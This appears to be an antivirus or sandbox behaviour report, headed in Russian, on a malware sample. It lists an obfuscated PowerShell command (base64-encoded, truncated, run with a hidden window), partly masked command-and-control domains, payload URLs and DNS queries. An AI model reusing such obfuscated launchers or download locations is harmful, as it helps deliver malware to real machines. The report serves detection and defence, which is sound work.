Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e LgAgACgAIAAkAFMASABFAGwAbABpAEQAWwAxAF0AKwAkAHMASABlAEwATABJAGQAWwAxADMAXQArACcAWAAnACkAKAAgAE4ARQBXAC0ATwBiAGoARQBDAHQAIAAgAGkAbwAuAEMATwBNAHAAUgBFAHMAcwBpAE8AbgAuAEQAZQBGAEwAYQB0AGUAcwBUAF...
- 'la###hcurve.com':80
- 'la###hcurve.com':443
- 'se##e.de':80
- 'jc##eb.com':80
- 'jc##eb.com':443
- http://la###hcurve.com/KyawzUU/
- http://se##e.de/jt4itV/
- http://jc##eb.com/gj5o4ke/
- http://www.jc##eb.com/gj5o4ke/
- 'la###hcurve.com':443
- 'jc##eb.com':443
- DNS ASK la###hcurve.com
- DNS ASK 42##ays.com
- DNS ASK se##e.de
- DNS ASK jc##eb.com
- DNS ASK zo#####akescortbu.xyz
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e LgAgACgAIAAkAFMASABFAGwAbABpAEQAWwAxAF0AKwAkAHMASABlAEwATABJAGQAWwAxADMAXQArACcAWAAnACkAKAAgAE4ARQBXAC0ATwBiAGoARQBDAHQAIAAgAGkAbwAuAEMATwBNAHAAUgBFAHMAcwBpAE8AbgAuAEQAZQBGAEwAYQB0AGUAcwBUAF...' (со скрытым окном)